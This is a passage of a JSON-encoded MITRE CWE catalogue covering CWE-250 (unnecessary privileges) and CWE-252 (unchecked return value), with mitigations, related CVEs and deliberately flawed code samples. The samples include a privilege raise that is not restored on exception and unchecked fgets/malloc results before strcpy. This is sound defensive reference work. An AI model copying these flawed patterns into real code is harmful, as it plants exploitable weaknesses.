coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Host Application Interface Scanner"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Configuration Checker","Permission Manifest Analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)","Formal Methods / Correct-By-Construction"]}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Attack Modeling"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":"Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations."},{"attr":{"@_Mitigation_ID":"MIT-18"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":"Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators."},{"attr":{"@_Mitigation_ID":"MIT-18"},"Phase":"Architecture and Design","Strategy":"Attack Surface Reduction","Description":"Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators."},{"Phase":"Implementation","Description":"Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements."},{"attr":{"@_Mitigation_ID":"MIT-19"},"Phase":"Implementation","Description":"When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed."},{"Phase":"Implementation","Description":"If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place."},{"attr":{"@_Mitigation_ID":"MIT-37"},"Phase":["Operation","System Configuration"],"Strategy":"Environment Hardening","Description":"Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-126"},"Intro_Text":"This code temporarily raises the program\'s privileges to allow creation of a new user folder.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Python"},"xhtml:div":{"#text":"def makeNewUserDir(username):","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if invalidUsername(username):try:except OSError:return True","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"print(\'Usernames cannot contain invalid characters\')return False","xhtml:br":["","",""],"xhtml:i":"#avoid CWE-22 and CWE-78"}},{"#text":"raisePrivileges()os.mkdir(\'/home/\' + username)lowerPrivileges()","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"#text":"print(\'Unable to create new user directory for user:\' + username)return False","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["","",""]}}}},"Body_Text":"While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur."},{"Intro_Text":"The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"chroot(APP_HOME);chdir(\\"/\\");FILE* data = fopen(argv[1], \\"r+\\");...","xhtml:br":["","",""]}},"Body_Text":"Constraining the process inside the application\'s home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced."},{"Intro_Text":"This application intends to use a user\'s location to determine the timezone the user is in:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();setTimeZone(userCurrLocation);","xhtml:br":["","","",""]}},"Body_Text":"This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API."},{"attr":{"@_Demonstrative_Example_ID":"DX-111"},"Intro_Text":"This code uses location to determine the user\'s current US State location.","Body_Text":["First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application\'s manifest.xml:","During execution, a call to getLastLocation() will return a location based on the application\'s location permissions. In this case the application has permission for the most accurate location possible:","While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"XML"},"xhtml:div":"&lt;uses-permission android:name=\\"android.permission.ACCESS_FINE_LOCATION\\"/&gt;"},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation);","xhtml:br":["","","",""]}}]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-4217","Description":"FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217"},{"Reference":"CVE-2008-1877","Description":"Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1877"},{"Reference":"CVE-2007-5159","Description":"OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159"},{"Reference":"CVE-2008-4638","Description":"Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638"},{"Reference":"CVE-2008-0162","Description":"Program does not drop privileges before calling another program, allowing code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162"},{"Reference":"CVE-2008-0368","Description":"setuid root program allows creation of arbitrary files through command line argument.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0368"},{"Reference":"CVE-2007-3931","Description":"Installation script installs some programs as setuid when they shouldn\'t be.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Privilege Management"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"SER09-J","Entry_Name":"Minimize privileges before deserializing from a privilege context"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"470"}},{"attr":{"@_CAPEC_ID":"69"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 7, &#34;Running with Least Privilege&#34; Page 207"}},{"attr":{"@_External_Reference_ID":"REF-199"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 16: Executing Code With Too Much Privilege.&#34; Page 243"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, &#34;Privilege Vulnerabilities&#34;, Page 477"}}]},"Notes":{"Note":[{"#text":"There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible.","attr":{"@_Type":"Relationship"}},{"#text":"CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The \\"least privilege\\" phrase has multiple interpretations.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Observed_Examples, References, Relationships, Type"}],"Previous_Entry_Name":[{"#text":"Often Misused: Privilege Management","attr":{"@_Date":"2008-01-30"}},{"#text":"Design Principle Violation: Failure to Use Least Privilege","attr":{"@_Date":"2009-01-12"}}]}},"252":{"attr":{"@_ID":"252","@_Name":"Unchecked Return Value","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.","Extended_Description":"Two common programmer assumptions are \\"this function call can never fail\\" and \\"it doesn\'t matter if this function call fails\\". If an attacker can force the function to fail or otherwise return a value that is not expected, then the subsequent program logic could lead to a vulnerability, because the software is not in a state that the programmer assumes. For example, if the program calls a function to drop privileges but does not check the return code to ensure that privileges were successfully dropped, then the program will continue to operate with the higher privileges.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"754","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"476","@_View_ID":"1000","@_Chain_ID":"690"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":["Availability","Integrity"],"Impact":["Unexpected State","DoS: Crash, Exit, or Restart"],"Note":"An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors."}},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-53"},"Phase":"Implementation","Description":"Check the results of all functions that return a value and verify that the value is expected.","Effectiveness":"High","Effectiveness_Notes":"Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment."},{"Phase":"Implementation","Description":"Ensure that you account for all possible return values from the function."},{"Phase":"Implementation","Description":"When designing a function, make sure you return a value or throw an exception in case of an error."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-7"},"Intro_Text":"Consider the following code segment:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf);","xhtml:br":["",""]}},"Body_Text":"The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy()."},{"attr":{"@_Demonstrative_Example_ID":"DX-114"},"Intro_Text":"In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int returnChunkSize(void *) {}int main() {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["","","","","",""],"xhtml:i":["/* if chunk info is valid, return the size of usable memory,","* else, return -1 to indicate an error","*/"]}},{"#text":"...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":""}},"Body_Text":"If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788)."},{"attr":{"@_Demonstrative_Example_ID":"DX-8"},"Intro_Text":"The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc().","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size);","xhtml:br":""}},"Body_Text":["The traditional defense of this coding error is: \\"If my program runs out of memory, it will fail. It doesn\'t matter whether I handle the error or allow the program to die with a segmentation fault when it tries to dereference the null pointer.\\" This argument ignores three important considerations:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue."},{"xhtml:div":"It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state."},{"xhtml:div":"The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know."}]}}]},{"attr":{"@_Demonstrative_Example_ID":"DX-9"},"Intro_Text":"The following examples read a file into a byte array.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {}","xhtml:br":"","xhtml:div":{"#text":"String userName = (String) i.Current();String pFileName = PFILE_ROOT + \\"/\\" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) {","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"String userName = (String) i.next();String pFileName = PFILE_ROOT + \\"/\\" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray);","xhtml:br":["","","","","",""]}}}}],"Body_Text":"The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker."},{"attr":{"@_Demonstrative_Example_ID":"DX-10"},"Intro_Text":"The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {}...","xhtml:br":["",""],"xhtml:div":{"#text":"...","attr":{"@_style":"margin-left:10px;"}}}}],"Body_Text":["The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference.","The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."]},{"attr":{"@_Demonstrative_Example_ID":"DX-11"},"Intro_Text":"The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"System.clearProperty(\\"os.name\\");...String os = System.getProperty(\\"os.name\\");if (os.equalsIgnoreCase(\\"Windows 95\\")) System.out.println(\\"Not supported\\");","xhtml:br":["","",""]}},"Body_Text":"The traditional defense of this coding error is: \\"I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn\'t matter whether I handle the error or allow the program to die dereferencing a null value.\\" But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved."},{"attr":{"@_Demonstrative_Example_ID":"DX-12"},"Intro_Text":"The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"Dim MyFile As New FileStream(\\"myfile.txt\\", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20))","xhtml:br":["","",""]}},"Body_Text":"In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested."},{"Intro_Text":"It is not uncommon for Java programmers to misunderstand read() and related methods that are part of many java.io classes. Most errors and unusual events in Java result in an exception being thrown. But the stream and reader classes do not consider it unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. This behavior makes it important for programmers to examine the return value from read() and other IO methods to ensure that they receive the amount of data they expect."},{"attr":{"@_Demonstrative_Example_ID":"DX-1"},"Intro_Text":"This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void host_lookup(char *user_supplied_addr){}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp);validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp-&gt;h_name);","xhtml:br":["","","","","","","","","",""],"xhtml:i":"/*routine that ensures user_supplied_addr is in the right format for conversion */"}}}},"Body_Text":["If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference\\n\\t       (CWE-476) would then occur in the call to strcpy().","Note that this code is also vulnerable to a buffer overflow (CWE-119)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-17533","Description":"Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533"},{"Reference":"CVE-2020-6078","Description":"Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078"},{"Reference":"CVE-2019-15900","Description":"Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900"},{"Reference":"CVE-2007-3798","Description":"Unchecked return value leads to resultant integer overflow and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798"},{"Reference":"CVE-2006-4447","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447"},{"Reference":"CVE-2006-2916","Description":"Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916"},{"Reference":"CVE-2008-5183","Description":"chain: unchecked return value can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183"},{"Reference":"CVE-2010-0211","Description":"chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211"},{"Reference":"CVE-2017-6964","Description":"Linux-based device mapper encryption program does not check the return value of setuid and setgid allowing attackers to execute code with unintended privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6964"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Unchecked Return Value"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Ignored function return value"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ERR33-C","Entry_Name":"Detect and handle standard library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS54-C","Entry_Name":"Detect and handle POSIX library errors","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"EXP00-J","Entry_Name":"Do not ignore values returned by methods"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP32-PL","Entry_Name":"Do not ignore function return values","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-252-resource"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-252-data"},{"attr":{"@_Taxonomy_Name":"OMG ASCRM"},"Entry_ID":"ASCRM-CWE-252-resource"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Program Building Blocks&#34; Page 